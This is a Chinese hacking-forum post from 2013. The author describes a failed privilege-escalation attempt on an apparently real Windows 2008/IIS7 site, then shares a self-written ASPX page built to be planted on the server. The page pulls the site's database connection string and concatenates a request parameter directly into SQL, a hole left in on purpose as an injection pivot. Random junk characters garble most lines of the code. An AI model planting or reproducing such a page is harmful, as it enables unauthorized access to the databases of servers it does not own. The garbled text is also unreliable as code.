昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
) I- ^( y# |- E% j# T6 h其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
6 i/ Y0 _2 T8 M6 h) c代码量不多,自己写个拉倒了。烦死了。
- {2 p# k/ l& P8 Z: p: y
% A, c( {- L6 q
8 P! f1 D1 d2 B- d3 q) N& j' e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">! q9 q3 P. |# D; h0 O
<html xmlns="http://www.w3.org/1999/xhtml">: E3 v- ?6 L; [/ m4 G
<head runat="server">; s# r$ j) ~8 ~! A0 Y
<title>暗影aspx构造注射专用页面</title>+ n/ Y- g0 g3 W) a! s- X" Y6 L
</head>+ B# c2 a& T7 G: g! Z
<body>
' I( {* W' x$ y: K! K! M* S <form id="form1" runat="server">1 `6 X& k2 F. Q0 y* E
<div>
1 z4 S. h6 \$ ~& t1 E* v( ] <script language="c#" runat="server">4 [3 T. Y! D F& B0 y3 B! d
5 ]3 P( S4 O0 A* M( W. ` void page_init(object sender, EventArgs e)
0 i0 b W& q } {
$ J) p( Q+ \' N B' \" O+ k 3 c8 i3 M; O( h* Q
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();; \9 B" Z, R/ l0 v8 a( ?" E
7 w( a2 |! W9 o$ \( v2 t/ i5 q
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
$ o" {# c$ U0 _) B$ Z. @" N conn.Open();& r$ k2 L* P( @4 X/ P
+ D" s# }* |- n0 A% B" C! M string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1: `& s; @* r2 ?( H# z
# Z9 U+ }$ A$ s; ~( p8 `9 y
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);; r' ?$ L: w& z' R+ d, q2 q) r( `
int x = command.ExecuteNonQuery();5 f! d. U% ]: ?- F4 E7 k- J
Response.Write(i+"\n");. T' a) `9 P1 V0 I' K& }
Response.Write(x);
0 A2 @' u) F) V5 v2 [# I conn.Close();
/ b+ r- z; O( `9 ^+ O" e }, O0 y9 K% J* P3 c! U) D2 y8 H
* W2 Q+ ~. y2 T# A </script>
4 Q" L- x! l: s( y: r6 J </div>
, I( L3 O; |8 c. a7 \' E c1 m </form>
9 |7 s; U, u- y* Z4 E2 v</body>
+ j! t, H) q( e+ ^( z4 a0 P- {</html>
& U2 r5 M- Y, X# K0 i" |& Y |
发表于 2013-3-20 21:32:01
收藏
支持
反对